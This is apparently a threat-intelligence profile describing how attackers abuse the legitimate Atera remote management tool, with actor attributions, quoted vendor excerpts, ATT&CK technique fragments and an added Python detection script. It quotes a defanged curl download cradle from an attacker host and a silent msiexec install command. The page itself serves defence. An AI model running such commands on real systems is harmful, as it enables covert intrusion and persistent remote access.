Atera
Atera is a legitimate cloud-based remote monitoring and management (RMM) platform that is repeatedly abused by threat actors as a remote access tool rather than malware developed by the actors themselves. Across the provided reporting, adversaries use Atera to establish and maintain footholds, execute remote and interactive PowerShell, transfer files, and persist in victim environments while blending in with normal IT activity through signed and trusted software.
Observed delivery and abuse patterns include renamed or trojanized installers and silent MSI-based deployment. Red Canary reported abuse involving renamed MSI installers such as MSTeam-installer.msi, and noted an intrusion where Atera was used to attempt installation of ScreenConnect via a curl-based cradle and then via Atera package management. CERT-UA described a phishing campaign targeting Ukrainian defense enterprises in which GLUEEGG and the DROPCLUE loader ultimately launched a BAT script that used curl.exe to download and silently install the legitimate ATERA agent with msiexec /i setup.msi /qn. FIN7 was reported to have staged legitimate software trojanized to contain an Atera agent installer on Amazon S3.
Atera has been observed in post-exploitation and ransomware-related activity. Mandiant observed deployment of Atera, AnyDesk, and SplashTop following successful exploitation of CitrixBleed / CVE-2023-4966 on NetScaler ADC and Gateway appliances to establish and maintain access. Reporting on LockBit activity stated operators deployed Atera after CitrixBleed exploitation to maintain persistence and enable remote, interactive PowerShell, including persistence after patching. NCC Group also observed Atera deployed as a secondary remote access and persistence mechanism during an Everest ransomware intrusion. Sophos reported abuse of the Atera agent during Log4Shell exploitation of VMware Horizon, alongside other payloads and backdoors.
Threat actors and clusters explicitly associated with Atera in the provided content include FIN7, LockBit operators, UAC-0180, TA450 historically, Iranian threat actors more broadly, and multiple uncategorized clusters tracked by Mandiant exploiting CVE-2023-4966. Proofpoint and Red Canary both highlighted broader cybercriminal adoption of Atera as part of a wider trend toward using legitimate RMM tools as first-stage payloads or persistence mechanisms.
Targeting mentioned in the content includes Ukrainian defense enterprises, organizations compromised through Citrix NetScaler exploitation across legal and professional services, technology, and government, and environments affected by ransomware or opportunistic exploitation. Defenders are specifically advised in the content to treat Atera-related infrastructure such as servicedesk.atera.com as suspicious when Atera is not authorized in the environment.
High-confidence artifacts and identifiers mentioned include renamed MSI installers such as MSTeam-installer.msi; silent installation via msiexec /i setup.msi /qn; AteraAgent.exe command-line parameters including agent-id, account-id, environment, customer-id, and folder-id; and example Atera-servicedesk URLs containing customerId, integratorLogin, and accountId parameters.
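The artifacts above translate directly into endpoint detection logic. The following is an added example, not code from the page or from any of the cited vendors: it scans constructed process-creation and DNS events for silent msiexec installs launched from a script interpreter, AteraAgent.exe starting with enrolment parameters on hosts where Atera is not an approved tool, and lookups of servicedesk.atera.com from such hosts. The event field names, the authorized-host inventory, and the `--agent-id` parameter spelling are assumptions.

```python
import re

# Hosts where Atera is an approved RMM tool (assumed inventory).
AUTHORIZED_ATERA_HOSTS = {"IT-ADMIN-01"}

# "msiexec /i <file>.msi /qn" style silent install, as seen in the CERT-UA BAT script.
SILENT_MSI = re.compile(r"msiexec(\.exe)?\s.*(/i|-i)\s+\S+\.msi.*(/qn|/quiet)", re.I)
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Enrolment parameters named in the reporting; the exact CLI syntax is assumed.
ATERA_PARAMS = ("agent-id", "account-id", "customer-id", "folder-id")

def analyse(events):
    """Return a list of (host, rule, detail) findings for the given events."""
    findings = []
    for e in events:
        host = e["host"]
        authorized = host in AUTHORIZED_ATERA_HOSTS
        if e["type"] == "process":
            cmd, parent = e["cmdline"], e["parent"].lower()
            # Rule 1: quiet MSI install spawned by a script interpreter.
            if SILENT_MSI.search(cmd) and parent in SCRIPT_PARENTS:
                findings.append((host, "silent_msi_from_script", cmd))
            # Rule 2: Atera agent enrolling on a host with no approved Atera use.
            if "ateraagent.exe" in cmd.lower() and not authorized:
                if any(p in cmd.lower() for p in ATERA_PARAMS):
                    findings.append((host, "unauthorized_atera_agent", cmd))
        elif e["type"] == "dns" and not authorized:
            # Rule 3: Atera service-desk infrastructure contacted from an unapproved host.
            if e["query"].lower().endswith("atera.com"):
                findings.append((host, "unauthorized_atera_dns", e["query"]))
    return findings

# Constructed sample telemetry modelled on the artifacts described above.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS-042", "parent": "cmd.exe",
     "cmdline": "msiexec /i setup.msi /qn"},
    {"type": "process", "host": "WS-042", "parent": "msiexec.exe",
     "cmdline": "AteraAgent.exe --agent-id PLACEHOLDER --account-id PLACEHOLDER"},
    {"type": "dns", "host": "WS-042", "query": "servicedesk.atera.com"},
    {"type": "process", "host": "IT-ADMIN-01", "parent": "services.exe",
     "cmdline": "AteraAgent.exe --agent-id PLACEHOLDER"},   # approved host: no alert
    {"type": "process", "host": "WS-007", "parent": "explorer.exe",
     "cmdline": "msiexec /i MSTeam-installer.msi /qn"},     # interactive: not rule 1
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

The renamed-installer case on WS-007 is deliberately left unalerted to show that a filename alone is not a reliable signal; the subsequent AteraAgent.exe launch and DNS lookup are what carry the detection.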
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
“Atera is a legitimate… remote monitoring and management tool… they install their own Atera agents…”
Groups observed using it
3 distinct threat actors attributed by public researchers.
...TA450 historically using several RMM tools, such as Atera, PDQ Connect, ScreenConnect, and SimpleHelp...
FIN7 has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.
...downloading and installing the MSI file of the legitimate remote computer management program ATERA...
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Initial Access
4 techniques
Instead of relying on malicious software that antivirus tools might catch and flag, they use legitimate remote access tools to blend in with normal IT activity.
The actor gained initial access through a phishing email directing the user to open a shared document hosted at hxxps[://]ws[.]onehub[.]com/files/ and download a file named ‘New Program ICC LTD.zip’.
Execution
3 techniques
Upon installing Atera Agent, the threat actors used Atera remote run commands to execute a PowerShell script (a.ps1) with the goal of dumping credentials and creating a backup file of the SYSTEM registry hive.
After which, the adversary first attempted a cradle (command line that downloads and installs a payload as a single command) to install ScreenConnect: cmd.exe /c mkdir C:\Temp 2>NUL & curl.exe -L hxxps[:]//server[.]rarexterna[.]top/Bin/ScreenConnect.ClientSetup[.]msi
Persistence
1 technique
Stealth
3 techniques
Post-compromise actions in Atera also included: ... An obfuscated PowerShell command used to download the Level RMM tool
Even when the file is renamed to something like party_invite.exe, or Voicemailaudioext.exe ... A common lure is themed as a Social Security statement (ssa.msi) ... using lures such as a document (docmentfilecsm_jw98evavuqm5gb3.exe) or an IRS tax-related file (IRS-Statement_Pr2ui4J9cfA6YEu.exe).
Credential Access
2 techniques
Discovery
2 techniques
Lateral Movement
2 techniques
Over the last few years, threat actors have flocked to exploit legitimate remote monitoring and management (RMM) tools—blue-chip IT software like ScreenConnect, LogMeIn Resolve, and PDQ Connect—blurring the line between legitimate IT administration and malicious intrusion.
Command and Control
5 techniques
Post-compromise actions in Atera also included: ... An SSH tunnel towards 51.16.209[.]105
The ‘New Program ICC LTD.zip’ archive contained a compressed installer file for legitimate remote monitoring and management (RMM) tool Atera.
Exfiltration
1 technique
IOCs tracked for this family
9 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, DNS infrastructure, and other indicator types observed in public reporting.
Recent activity
12 sources tracked across advisories, community write-ups, and news.
A cloud-based IT management platform abused through renamed MSI installers. Attackers use its package management and agent functionality to install and manage secondary payloads, notably ScreenConnect.
A legitimate remote monitoring and management tool abused by Iranian threat actors for persistence and lateral movement.
Legitimate RMM tool previously abused by TA450 for foothold/remote access in intrusions.
A legitimate RMM tool increasingly seen in malicious email campaigns as a first-stage payload for remote access and follow-on activity.